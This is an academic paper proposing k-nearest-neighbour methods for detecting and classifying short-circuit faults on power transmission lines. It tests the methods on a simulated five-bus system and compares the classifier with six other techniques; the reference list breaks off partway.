{"ft_lang_label":"__label__en","ft_lang_prob":0.88096815,"math_prob":0.95328605,"size":45586,"snap":"2020-45-2020-50","text_gpt3_token_len":10787,"char_repetition_ratio":0.15144137,"word_repetition_ratio":0.02671206,"special_character_ratio":0.2431887,"punctuation_ratio":0.13039151,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.99061275,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-24T20:32:19Z\",\"WARC-Record-ID\":\"<urn:uuid:62d071bc-640c-4044-9fd2-417ef659172b>\",\"Content-Length\":\"63097\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5a7dee3a-53ca-4837-93d7-361a986ed417>\",\"WARC-Concurrent-To\":\"<urn:uuid:9900e76c-a702-4894-aaf6-679f4e70cb1e>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://ocaml.xyz/book/nlp.html\",\"WARC-Payload-Digest\":\"sha1:ADTJAX7ON4ZPV2CBLUKXFQC3TJQ6XOUP\",\"WARC-Block-Digest\":\"sha1:JZJNRWDP2HDMSR6PYQCUC4E7K7N4KOMH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141177566.10_warc_CC-MAIN-20201124195123-20201124225123-00405.warc.gz\"}"}
https://portal.nordu.net/exportword?pageId=59508012
[ "Date: Thu, 7 Jul 2022 14:14:16 +0000 (GMT) Message-ID: <295320091.593.1657203256692@7a4fc1c8b7d3> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary=\"----=_Part_592_533680678.1657203256692\" ------=_Part_592_533680678.1657203256692 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location: file:///C:/exported.html 201607 - Public report\n\n# 201607 - Public report\n\n=20\n\nUnscheduled:\n\n=20\n=20\n• July 12th: Customer performed move to another server room.\n• =20\n• July 7th: Loss of signal between Narvik and Kiruna due to a fiber break=\n• =20\n• July 6th: Link to umu-br2 was down due to a fiber break between Vindeln= and Ume=C3=A5.\n• =20\n• June 30th: Red link in G=C3=B6teborg area was down due to several cuts = along the fiber circuit. The fiber has now been spliced by the local provid= er and all connections are restored.\n• =20\n=20\n\nScheduled:\n\n=20\n=20\n• July 15th: We performed a planned maintenance to switch storage system = for Sunet Adobe Connect.\n• =20\n• July 10th: Fiber maintenance was performed in Sandviken, affecting DU.<= /li>=20\n• July 10th: Fiber supplier performed reconnections due to cable repair, = Sven=C3=A4cker-Mellerud. Affecting WR.\n• =20\n• July 7th: Fiber supplier performed a planned capacity upgrade maintenan= ce near Nyn=C3=A4shamn.\n• =20\n• July 5th: Supplier performed an exchange of previously damaged cable. T= his affected SH red network.\n• =20\n• July 4th: The Sunet Adobe connect system was migrated to new servers an= d the database to a new database setup.\n• =20\n=20\n=20\n=20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20 =20\n\nScope\n\nUnscheduled\n\nScheduled\n\nTotal\n\nHardware\n\n0 pcs\n\n1 pcs 00:54\n\n1 pcs 00:54\n\n3 pcs 9d 19:35\n\n4 pcs 05:31\n\n7 pcs 10d 01:06\n\nNone\n\n1 pcs 05:41\n\n0 pcs\n\n1 pcs 05:41\n\nRouting\n\n0 pcs\n\n0 pcs\n\n0 pcs\n\nSoftware\n\n0 pcs\n\n1 pcs 03:13\n\n1 pcs 03:13\n\n=20\n\n------=_Part_592_533680678.1657203256692--" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82253623,"math_prob":0.4190095,"size":1999,"snap":"2022-27-2022-33","text_gpt3_token_len":707,"char_repetition_ratio":0.1614035,"word_repetition_ratio":0.032786883,"special_character_ratio":0.43071535,"punctuation_ratio":0.14108911,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9863845,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-07T14:14:16Z\",\"WARC-Record-ID\":\"<urn:uuid:e8a4463d-44bd-4584-af9b-219bab8553bc>\",\"Content-Length\":\"9076\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:43c07fa0-3a8a-429b-8298-532d4bd045c2>\",\"WARC-Concurrent-To\":\"<urn:uuid:25692ad3-2700-461b-a9eb-efd40f77d46c>\",\"WARC-IP-Address\":\"109.105.110.80\",\"WARC-Target-URI\":\"https://portal.nordu.net/exportword?pageId=59508012\",\"WARC-Payload-Digest\":\"sha1:GTQTWW6P65SYZQQB5KU4O4ANNTOATAZK\",\"WARC-Block-Digest\":\"sha1:T6GP662BCONI5DV6ENBFCUZAUKL3JY2A\",\"WARC-Identified-Payload-Type\":\"message/rfc822\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104692018.96_warc_CC-MAIN-20220707124050-20220707154050-00602.warc.gz\"}"}
https://mathematica.stackexchange.com/questions/114692/dynamically-sized-n-times-n-checkboxes-corresponding-to-a-matrix
[ "Dynamically sized $n\\times n$ checkboxes corresponding to a matrix\n\nI was wondering if it was possible to do to following:\n\n1. have an input field for an integer where you input the $n$\n\n2. have an $n\\times n$ matrix of checkboxes that would correspond to an $n\\times n$ matrix which has 0's where there boxes are not checked and 1's where they are. This would allow me to input the adjacency matrix of a graph into Mathematica in a fairly easy way without having to type it up every time.\n\nEDIT: Something like this code modified for my purposes\n\nManipulate[\nArrayPlot[Take[data, n, n]],\n{{data, RandomInteger[{0, 1}, {20, 20}]}, ControlType -> None},\n{{n, 5}, 1, 20, 1},\nDynamic[\nPanel[Grid[Outer[Checkbox[Dynamic[data[[#1, #2]]], {0, 1}] &, Range[n], Range[n]]]]]]\n\nEDIT: I have the graphing code working properly as shown below but I want to change/add two things. 1) instead of n being a slider I want it to be an input box. 2) I want to implement FindshortestPath function on the graph that is generated with two input boxes for which two vertices you are finding the path between\n\nManipulate[ GraphPlot[Take[data, n, n], VertexLabeling -> True, SelfLoopStyle -> All], {{data, RandomInteger[{0, 0}, {20, 20}]}, ControlType -> None}, {{n, 5}, 1, 10, 1}, Dynamic[Panel[ Grid[Outer[Checkbox[Dynamic[data[[#1, #2]]], {0, 1}] &, Range[n], Range[n]]]]]]\n\nA bit simple minded:\n\nDynamicModule[{n = 3, bs},\nPanel[Column[{Slider[Dynamic[n, {(n = #) &,\n(bs = PadRight[bs, {n, n}]) &}],\n{2, 100, 1}],\nRow[{Dynamic[Grid[Array[Checkbox[Dynamic[bs[[##]]], {0, 1}] &,\n{n, n}]]],\nSpacer, Dynamic[ArrayPlot[bs]]}]}]],\nInitialization :> {bs = ConstantArray[0, {n, n}]}]", null, "You can modify it to use an InputField[] instead for changing the array's size.\n\n• I tried changing your code like this in order for it to treat the matrix as the adjacency matrix for a graph as well as inputfield but ran into some issues. DynamicModule[{n = 3, bs}, Panel[Column[{InputField[ Dynamic[n, {(n = #) &, (bs = PadRight[bs, {n, n}]) &}], {2, 20, 1}], Row[{Dynamic[ Grid[Array[Checkbox[Dynamic[bs[[##]]], {0, 1}] &, {n, n}]]], Spacer, Dynamic[GraphPlot[bs]]}]}]], Initialization :> {bs = ConstantArray[0, {n, n}]}] – ayrnee May 9 '16 at 13:44\nManipulate[Row[{ArrayPlot[mat[[;; k, ;; k]], ImageSize -> 300],\nAdjacencyGraph[mat[[;; k, ;; k]], ImageSize -> {300, 300}]}],\n{{mat, ConstantArray[0, {50, 50}]}, None}, {k, 4, None},\nDynamic[Column[{InputField[Dynamic[k, (k = Clip[IntegerPart@#, {2, 20}]) &], Number,\nFieldSize -> {8, 1}],\nPanel[Grid[Outer[Checkbox[Dynamic[mat[[#, #2]]], {0, 1}] &, Range@k, Range@k]]]}]]]", null, "Update:\n\nI want to implement FindShortestPath function on the graph that is generated with two input boxes for which two vertices you are finding the path between\n\nManipulate[Row[{ArrayPlot[mat[[;; k, ;; k]], ImageSize -> 300],\nWith[{ag = AdjacencyGraph[mat[[;; k, ;; k]], ImageSize -> {300, 300},\nVertexLabels -> \"Name\", ImagePadding -> 5]},\nHighlightGraph[ag, PathGraph[FindShortestPath[ag, s, t],\nDirectedEdges -> True]]]}],\n{{mat, ConstantArray[0, {50, 50}]}, None},\n{k, 6, None}, {s, 1, None}, {t, 2, None},\nDynamic[Row[{Column[{Style[\"size\", 14, \"Panel\"],\nInputField[Dynamic[k, (k = Clip[IntegerPart@#, {2, 20}]) &],\nNumber, FieldSize -> {8, 1}],\nStyle[\"source/target\", 14, \"Panel\"],\nInputField[Dynamic[s, (s = Clip[IntegerPart@#, {2, 20}]) &],\nNumber, FieldSize -> {8, 1}],\nInputField[Dynamic[t, (t = Clip[IntegerPart@#, {2, 20}]) &],\nNumber, FieldSize -> {8, 1}]}, Alignment -> Top],\nPanel[Grid[Outer[Checkbox[Dynamic[mat[[#, #2]]], {0, 1}] &, Range@k,\nRange@k]]]}, Spacer]]]", null, "" ]
[ null, "https://i.stack.imgur.com/rwrWG.png", null, "https://i.stack.imgur.com/nG7LV.png", null, "https://i.stack.imgur.com/yKVuT.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83492094,"math_prob":0.9837203,"size":1273,"snap":"2019-43-2019-47","text_gpt3_token_len":365,"char_repetition_ratio":0.09219858,"word_repetition_ratio":0.06,"special_character_ratio":0.31029066,"punctuation_ratio":0.17407407,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9968537,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,5,null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-20T22:15:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ce4acc87-faca-4145-830a-32655721ac4b>\",\"Content-Length\":\"148320\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:097cf75a-8f1c-45a2-be46-e23bab5cffac>\",\"WARC-Concurrent-To\":\"<urn:uuid:91d54b27-969e-408d-863d-21519811bc14>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://mathematica.stackexchange.com/questions/114692/dynamically-sized-n-times-n-checkboxes-corresponding-to-a-matrix\",\"WARC-Payload-Digest\":\"sha1:LOZCD7KRMEUJQ4J7KPZNWASO4VEOLPFC\",\"WARC-Block-Digest\":\"sha1:OLEJVRJPYSKNWAB5GSBXRPNBHNH2TOB5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986726836.64_warc_CC-MAIN-20191020210506-20191020234006-00517.warc.gz\"}"}
http://acm.sdut.edu.cn/onlinejudge2/index.php/Home/Index/problemdetail/pid/3296.html
[ "XiaoXin’s Kingdom\n\nTime Limit: 1000 ms Memory Limit: 65536 KiB\n\nProblem Description\n\nProblem Description:\n\nXiaoXin has a kingdom with the infinite area.\n\nHe has n soldiers guarding the kingdom.\n\nThe i-th soldier stands at the position (xi,yi), and his walking speed is vi.\n\nIf a point can be reached by a soldier, and the time this soldier walking to this point is strictly less than other soldiers, this point is in the charge of this soldier.\n\nFor every soldier, XiaoXin wants to know if the area in the charge of him is infinite.\n\nInput\n\nThere are multiple test cases, terminated by a line \"0\".\n\nFor each test case, the first line contains one integer n(1<=n<=500).\n\nIn following n lines, each line contains three integers xi,yi,vi(0<=|xi|,|yi|,vi<=10^4).\n\nOutput\n\nOutput\n\nFor each case, output \"Case #k: s\", where k is the case number counting from 1, and s is a string consisting of n character. If the area in the charge of the i-th soldier isn\\'t infinite, the i-th character is \"0\", else it\\'s \"1\".\n\n3\n0 0 3\n1 1 2\n2 2 1\n0\n\nCase #1: 100\n\nGLSilence" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88605595,"math_prob":0.70790905,"size":945,"snap":"2019-43-2019-47","text_gpt3_token_len":263,"char_repetition_ratio":0.120085016,"word_repetition_ratio":0.023952097,"special_character_ratio":0.27407408,"punctuation_ratio":0.12903225,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96125257,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T06:32:22Z\",\"WARC-Record-ID\":\"<urn:uuid:5dfa4ea0-597e-423c-a19f-93cc4e62bd5c>\",\"Content-Length\":\"10096\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3b78be3-3306-4fe5-a843-83e3eac85080>\",\"WARC-Concurrent-To\":\"<urn:uuid:996d99a1-5e4d-4528-aa1a-36a79d4e9d2c>\",\"WARC-IP-Address\":\"210.44.176.195\",\"WARC-Target-URI\":\"http://acm.sdut.edu.cn/onlinejudge2/index.php/Home/Index/problemdetail/pid/3296.html\",\"WARC-Payload-Digest\":\"sha1:V6KEYLTEHKJZY6C5YQ2KRXKF2DIOEJ4T\",\"WARC-Block-Digest\":\"sha1:N4O45TWK4VALLFPY7VD57CCD4QAAZHHS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986672723.50_warc_CC-MAIN-20191017045957-20191017073457-00399.warc.gz\"}"}
https://pcmp.springeropen.com/articles/10.1186/s41601-017-0063-z
[ "# k-NN based fault detection and classification methods for power transmission systems\n\n## Abstract\n\nThis paper deals with two new methods, based on k-NN algorithm, for fault detection and classification in distance protection. In these methods, by finding the distance between each sample and its fifth nearest neighbor in a pre-default window, the fault occurrence time and the faulty phases are determined. The maximum value of the distances in case of detection and classification procedures is compared with pre-defined threshold values. The main advantages of these methods are: simplicity, low calculation burden, acceptable accuracy, and speed. The performance of the proposed scheme is tested on a typical system in MATLAB Simulink. Various possible fault types in different fault resistances, fault inception angles, fault locations, short circuit levels, X/R ratios, source load angles are simulated. In addition, the performance of similar six well-known classification techniques is compared with the proposed classification method using plenty of simulation data.\n\n## Introduction\n\nDistance protection is one of the major protections of power systems, utilized for detection, classification, and location of short circuit faults. In the detection stage, any change caused by different normal and abnormal conditions is recognized. Then in the classification stage, the type of faults (Ag, Bg, Cg, ABg, BCg, CAg, AB, BC and CA) is determined.\n\nIn the fault location stage, the distance between the fault and the relay is determined. Due to importance of speed and accuracy of fault detection and classification units, too many investigations have been dedicated to these fields.\n\nWhen a fault occurs in the power system, variables such as current, power, power factor, voltage, impedance, and frequency change. Many detection techniques detect fault occurrence by comparing the post-fault values of these variables with their values during system normal operation. Some of fault detection methods are based on Kalman filter , first derivative method, Fourier transform (FT), and least squares . Some other methods are based on differential equations , travelling waves [3, 4], phasor measurement , discrete wavelet transform , fuzzy logic, genetic algorithm and neural network .\n\nAlso, many efforts have been made in the field of fault classification, which can be broadly categorized in two main groups. First, methods that are based on signatures of the signals and definition of some criteria such as: discrete wavelet transform (DWT) [9,10,11,12,13], Fourier transform (FT), S-transform , adaptive Kalman filtering , sequential components [16, 17], and synchronized voltage and current samples . The second group includes the methods based on artificial intelligence techniques such as: Artificial Neural Networks (ANN) [19,20,21], fuzzy logic [22, 23], Support Vector Machine (SVM) [24,25,26], and decision-tree .\n\nIn this paper, two new methods are presented for detection and classification of faults. A moving window with the length of half cycle of power frequency is considered and the RMS value of the current samples is computed in the window. The RMS value obtained in the last window before fault, in which the fault instant is the last sample, is saved. The current waveforms are divided by the saved RMS value. Then, k-NN algorithm is applied to these normalized waveforms and their squares in classification and detection methods, respectively.\n\nIn the detection method, a moving window with the length of half cycle is considered. In the window, besides finding the fifth nearest neighbor for each point of the squared normalized currents, the distance between each point and its corresponding neighbor is found. By comparing the maximum distance in each window with an adaptive threshold, the fault is detected.\n\nThe classification method has a similar trend, but the k-NN algorithm is applied to the instantaneous values of normalized three-phase currents and length of the window is three quarters of a cycle.\n\nVarious scenarios including different fault types, fault inception angles, fault resistances, fault locations, sources phase angles, X/R ratios, and short circuit levels are used to evaluate the performance of the methods in a simulated typical five-bus power system. Also, in order to evaluate the performance of the proposed classification method, it is compared with six other similar methods. The methods are compared in terms of delay time and accuracy using a data set including 450 different cases. Beside the simplicity, the proposed techniques have small calculation burden and high accuracy. Moreover, the methods performance is preserved in different conditions.\n\nThe remainder of this paper is organized as follows: Section 2 presents the under-study power system. In Section 3, basis of k-NN and its application for fault detection as well as an improved fault detection algorithm are presented. In Section 4, the proposed classification algorithm is introduced. The simulation results are presented in Section 5. A comparison between the performance of the proposed method and some other similar methods is presented in Section 6. Finally, the main conclusions are presented in Section 7.\n\n## Simulated power system\n\nA five-bus power system is modeled in MATLAB Simulink. A schematic single line diagram of the under study system is presented in Fig. 1. The modeled system comprises of two generators, four transformers and active and reactive loads connected to buses 4 and 5. Detailed specification of the system components are as follows:\n\n• Generators: Rated line to line voltage is 20 kV, three-phase short-circuit power is 1000 MVA, frequency is 50 Hz, X/R ratio is 10. Also it is assumed that the angles of sources 1 and 2 are 0 and −10 degree, respectively.\n\n• Transformers: Rated power is 600 MVA, voltage ratio is 20/230 kV with delta-star-grounded connection, its primary and secondary impedances are 0.06 + j0.3 Ω and 0.397 + j2.12 Ω.\n\n• Lines: All of line impedances are 0.02 + j0.15 Ω/km. Lines 1–2, 2–3, 3–4, 4–1, and 5–2 are 200, 70, 120, 40, and 50 km, respectively.\n\n• Loads: The active and reactive powers of load 1 are 400 MW and 100 MVAr, respectively. The active and reactive powers of load 2 are 100 MW and 50 MVAr, respectively.\n\nSampling frequency: It is equal to 10 kHz.\n\n## The proposed change detection scheme\n\n### k-Nearest Neighbor algorithm (k-NN)\n\nThe k-NN algorithm is a nonparametric classification method that can achieve high classification accuracy in problems with non-normal and unknown distributions. For a particular sample, k closest points between the data and the sample are found. Usually, the Euclidean distance is used, where one point’s components are utilized to compare with the components of another point.\n\nThe basis of k-NN algorithm is a data matrix that consists of N rows and M columns. Parameters N and M are the number of data points and dimension of each data point, respectively. Using the data matrix, a query point is provided and the closest k points are searched within this data matrix that are the closest to this query point.\n\nIn general, the Euclidean distance between the query and the rest of the points in the data matrix is calculated. After this operation, N Euclidean distances which symbolize the distances between the query with each corresponding point in the data set are achieved. Then, the k nearest points to the query can be simply searched by sorting the distances in ascending order and retrieving those k points that have the smallest distance between the data set and query.\n\n### The proposed fault detection algorithm\n\nConsidering fixed sampling frequency, Euclidean distance between each sample and other samples of a considered sliding window varies when a change occurs. In fact, Euclidean distance represents differences between the samples values. k-NN algorithm can derive variation of the Euclidean distance for change detection. In this work, a sliding window with length of half cycle of power frequency is moved on squared normalized current waveform of each phase. Then, k-NN algorithm is applied to the samples of each window and the fifth nearest neighbor for each sample and the distance between them is obtained. Finally, the maximum distance is selected for each phase named Ma,D, Mb,D, and Mc,D. Based on different simulations, it is confirmed that the fifth nearest neighbor gives the best accuracy. In addition to the derived fifth neighbor, the distance between each sample and its corresponding fifth neighbor is derived. Considering sampling frequency 10 kHz, there are 100 samples in each half cycle, result in 100 different distances. Among them, the maximum distance is compared with a certain threshold value to detect fault condition.\n\nIn case of change occurrence, the sample corresponding to the change enters the end of the window. It is observed that after three or four samples, the maximum distance of some or all of the phases exceed the threshold value. By considering an appropriate value for the threshold, it is possible to detect the fault after 0.2 ms to 0.4 ms. In this study, Ith,D = 0.0667 is selected for fault detection threshold. Flowchart of the proposed algorithm for change detection is shown in Fig. 2.\n\nIn Fig. 3, the proposed criterion for some different fault cases is presented. The instants of change occurrence and the relevant detection times, are shown.\n\n## The proposed fault classification scheme\n\nThe general approach for fault classification is the same as detection method. However, in the classification method the k-NN algorithm is implemented in a window applied to normalized current waveforms with length of three quarters of a cycle, called analysis window. The considered k value and length of analysis window are selected based on different simulations to achieve the best accuracy and speed for the classification.\n\nIn Fig. 4, three-phase distances values for some different fault types with negligible resistance and inception instant equal to 0.2002 s are presented. In these figures, the fifth nearest neighbor for each sample of the analysis window is shown.\n\nIt is obvious, the distance between each sample of current and its fifth neighbor is a suitable criterion for fault classification. By choosing the maximum distance for each phase (Ma,C, Mb,C, and Mc,C) and comparing it with a threshold value, the type of fault can be determined. It is obvious that the values of Ma,C, Mb,C, and Mc,C are obtained exactly the same as detection method, but in a window with the length of three quarters of a cycle. The best threshold value is selected using different simulations.\n\nSome other considerations are taken into account for the classification method, which are as follows:\n\n1. 1.\n\nFor discrimination between two phase faults (LL) and grounded two phase faults (LL-g), the means of three phases’ corresponding current samples in the analysis window is obtained and the maximum mean is utilized as follows:\n\n$$Mi=\\max \\left(\\frac{ia+ ib+ ic}{3}\\right)\\kern0.5em in the analysis window$$\n\nIn case of grounded faults (LL-g), Mi > 100 A and Mi < 1 A for two phase faults (LL). This criterion can discriminate between LL and LL-g with a very high accuracy.\n\n1. 2.\n\nIn order to omit the initial transient behavior of the signal, twenty first samples of the window are not considered.\n\nThe flowchart of the classification method is presented in Fig. 5 . Threshold Ith,C is set to 0.1108.\n\n## Test cases and simulation results\n\n### Case 1: Various fault types\n\nDifferent fault types are applied at the middle of line 1–2 of the power system shown in Fig. 1. The results are shown in Table 1. The faults are solid and applied at an identical inception instant 0.2002 s. Results including the discrimination criteria (Mi) and the maximum distance of each phase are presented in Table 1. From the results, one can conclude that the proposed method is able to classify different faults using the mentioned rules.\n\nThe results for each group of phase-to-ground, phase-to-phase-to-ground, and phase-to-phase faults are similar. Therefore, hereafter only four types of faults including: Ag, ABg, AB, and ABC are considered.\n\n### Case 2: Various inception instants\n\nIn Table 2, the results for different inception instants are presented for the mentioned faults. The inception instant is varied by step 3 ms. Faults are also considered solid type. The results confirm that the proposed method is able to classify faults at different inception instants.\n\n### Case 3: Various fault resistances\n\nIn Table 3, the results of this case study for fault resistances 10, 30, 50,70, and 90 Ω, are shown. The faults are applied at an identical inception instant 0.2002 s. From the results, it is confirmed that the proposed method has acceptable performance for fault resistance up to 90 Ω. Although the technique can also classify the faults with resistances more than 90 Ω, the performance may be less than the acceptable value.\n\n### Case 4: Various fault locations\n\nOne of the other challenges that should be considered for a fault identification technique is location of the fault in the transmission lines. In this test case, the system is analyzed with a fault applied at 0%, 20%, 40%, 60%, 80%, and 100% of the transmission line 1–2. Results of the four fault types are shown in Table 4. The faults are solid type and applied at an identical inception instant 0.2002 s.\n\nIn addition, several faults for locations more than 100% are simulated. The faults are applied at 105%, 110%, and 120% of the transmission line 2–5 at an identical inception instant 0.2002 s. The results are tabulated in Table 5.\n\nFrom the results, it can be concluded that the performance of the proposed method is preserved even for locations more than 100%. It should be mentioned that the performance of the proposed method degrades for locations more than 120%.\n\n### Case 5: Various sources load angles\n\nThe results for various angles, according different inception instant, fault resistances, and fault types verify that proposed method classify the faults in different values of sources load angles. For abbreviation, the results relevant to this case are not presented.\n\n### Case 6: Various X/R ratios\n\nDifferent X/R ratios impact on the performance of the proposed method is also investigated, considering different inception instant, fault resistances, and fault types. From the results, it can be concluded that accuracy of the proposed method is preserved for different values of X/R ratios.\n\n### Case 7: Various short circuit levels\n\nThe performance of the proposed method is also evaluated for various sources short circuit levels. The algorithm also has desirable performance for these cases.\n\n### Case 8: Various load levels\n\nIn Table 6, the results of some simulated cases for no-load and loads with fraction of the nominal value are shown. It should be noted that for each load, different load values are considered in the condition of no-load of the other one. All the faults are applied in the location of 80% of the transmission line 1–2. From the results, one can observe that the performance of the proposed method is preserved in different load levels.\n\n### Case 9: Current transformer saturation\n\nThe performance of the method is also evaluated during current transformer saturation. Two typical cases are considered. The faults are solid type and applied at an identical inception instant 0.2345 s. The classification criteria for both cases are shown in Fig. 6 and Table 7. It is observed that the proposed method is able to classify the faults during current transformer saturation.\n\n## A comparison with other techniques\n\nThe performance of the proposed method is compared with six other similar approaches in this Section. All of the methods are evaluated using an identical data set in similar conditions. The six methods are briefly reviewed as follows:\n\na. Sequence Component : This technique classifies the faults using the phase differences between positive and negative sequences. Also, relative magnitudes of negative and zero sequences from pre-fault to the fault stage are used to distinguish between phase-to-phase (LL) and phase-to-phase-to-ground (LLg) faults.\n\nb. Alienation Coefficients : In this algorithm, alienation technique is applied to two half successive cycles with the same polarity. The alienation coefficients of the successive cycles as two dependent variables are calculated. This technique is capable of classification using only three-phase current waveforms and its delay time is half cycle of power frequency. Also, another version of this approach is presented in .\n\nc. Discrete Wavelet Transform : Daubechies family of wavelet transform is used in this technique. Third level output among different decomposed levels is used and the summation of detailed current signals for each phase (Sa, Sb, and Sc) is obtained. If the summation of Sa, Sb, and Sc is equal to zero, then the fault type is either three-phase or LL, otherwise, it is phase-to-ground (Lg) or LLg fault.\n\nd. Fuzzy Logic : The prerequisite of this technique is fault occurrence time. In this algorithm, using measured current samples, some specific characteristics for the samples are defined for the fault classification. The technique takes three quarters of a cycle to classify the fault.\n\ne. Using RMS Values of current: A simple approach to classify the faults is based on comparing the RMS values of three-phase current waveforms with a certain threshold. The RMS values of the phases are obtained using Fourier transform in a half cycle window after fault occurrence. Discrimination between LL and LLg is determined using zero sequence component of current, which is large for LLg and zero for LL.\n\nf. Using RMS Values of Voltage: This technique is exactly the same as previous method for three-phase voltage signals. Type of fault is determined when the RMS values of the voltages become less than a certain threshold.\n\nThe performance of the proposed method is compared with the above-mentioned methods based on following factors; the results are tabulated in Table 8:\n\n• Fault resistances\n\n• Fault inception instants\n\n• Fault locations\n\n• Generators X/R ratios\n\n• Phase difference between two generators\n\n• Generators short circuit levels\n\n• Delay operation time\n\n• Error percentage\n\nThe number of the whole cases considered in this Section is 410; 200 cases for different fault resistances and inception instants, 50 cases for different fault locations, 70 cases for different sources X/R ratios, 50 cases for different sources angles, and 40 cases for different short circuit levels.\n\nIn Table 8, error percentages for the above mentioned factors are calculated as the ratio of number of mal-function operations to number of the relevant cases. Then, total error percentage for each method is calculated as ratio of number of whole mal-function operations to number of whole the cases.\n\nTechniques a and d have a delay time 15 ms and techniques b, c, e, and f have a delay time 10 ms. Among the methods with delay time 15 ms, fuzzy logic has a very good performance with only 0.49% error.\n\nThe proposed technique has a good performance with error percentage of 1.95% and average delay time of 15 ms. Based on the calculated total error percentage and delay time, it is confirmed that the proposed method has acceptable performance in comparison with other methods.\n\n## Conclusion\n\nTwo simple methods for fault detection and classification are presented in this paper. The methods are based on k-NN algorithm. Plenty of simulations were used in order to evaluate the performance of the methods. The performance of the proposed classification method is compared with six other similar methods. From the results, the good accuracy and speed of the methods are confirmed. The classification technique has accuracy about 98% for the considered data set with 15 ms average delay time.\n\n## References\n\n1. Chowdhury, F. N., Christensen, J. P., & Aravena, J. L. (1991). Power system fault detection and state estimation using Kalman filter with hypothesis testing. IEEE Transactions on Power Delivery, 6(3), 1025–1030.\n\n2. Öhrström, M., & Söder, L. (2002). Fast fault detection for power distribution systems. Power and energy systems (PES), Marina del Rey, USA, may 13–15.\n\n3. Magnago, F. H., & Abur, A. (1999). A new fault location technique for radial distribution systems based on high frequency signals. IEEE in Power Engineering Society Summer Meeting, 1, 426–431.\n\n4. Xiangjun, Z., Yuanyuan, W., Yao, X. (2010). Faults detection for power systems. INTECH Open Access Publisher. In W. Zhang (E.d.), Fault Detection (pp. 512). InTech. ISBN 978-953-307-037-7. doi:10.5772/56395. https://www.intechopen.com/books/fault-detection\n\n5. Gopakumar, P., Reddy, M. J. B., & Mohanta, D. K. (2015). Transmission line fault detection and localisation methodology using PMU measurements. Journal of IET, Generation, Transmission & Distribution, 9(11), 1033–1042.\n\n6. Bezerra Costa, F. (2014). Fault-induced transient detection based on real-time analysis of the wavelet coefficient energy. IEEE Transactions on Power Delivery, 29(1), 140–153.\n\n7. Haghifam, M. R., Sedighi, A. R., & Malik, O. P. (2006). Development of a fuzzy inference system based on genetic algorithm for high-impedance fault detection. Journal of IEE Proceedings-Generation, Transmission and Distribution, 153(3), 359–367.\n\n8. Baqui, I., Zamora, I., Mazón, J., & Buigues, G. (2011). High impedance fault detection methodology using wavelet transform and artificial neural networks. Journal of Electric Power Systems Research, 81(7), 1325–1333.\n\n9. Shaik, A. G., & Pulipaka, R. R. V. (2015). A new wavelet based fault detection, classification and location in transmission lines. International Journal of Electrical Power & Energy Systems, 64, 35–40.\n\n10. Torabi, N., Karrari, M., Menhaj, M. B., Karrari, S. (2012). 'Wavelet Based Fault Classification for Partially Observable Power Systems. IEEE, In Asia-Pacific Power and Energy Engineering Conference (APPEEC) (pp. 1–6).\n\n11. Usama, Y., Lu, X., Imam, H., Sen, C., & Kar, N. (2013). Design and implementation of a wavelet analysis-based shunt fault detection and identification module for transmission lines application. IET Journal of Generation, Transmission & Distribution, 8(3), 431–444.\n\n12. Guillen, D., Arrieta Paternina, M. R., Zamora, A., Ramirez, J. M., & Idarraga, G. (2015). Detection and classification of faults in transmission lines using the maximum wavelet singular value and Euclidean norm. IET Journal of Generation, Transmission & Distribution, 9(15), 2294–2302.\n\n13. Liu, Z., Han, Z., Zhang, Y., & Zhang, Q. (2014). Multiwavelet packet entropy and its application in transmission line fault recognition and classification. IEEE Transactions on Neural Networks and Learning Systems, 25(11), 2043–2052.\n\n14. Dash, P. K., Das, S., & Moirangthem, J. (2015). Distance protection of shunt compensated transmission line using a sparse S-transform. IET Journal of Generation, Transmission & Distribution, 9(12), 1264–1274.\n\n15. Girgis, A., & Makram, E. B. (1988). Application of adaptive Kalman filtering in fault classification, distance protection, and fault location using microprocessors. IEEE Transactions on Power Systems, 3(1), 301–309.\n\n16. Adu, T. (2002). An accurate fault classification technique for power system monitoring devices. IEEE Transactions on Power Delivery, 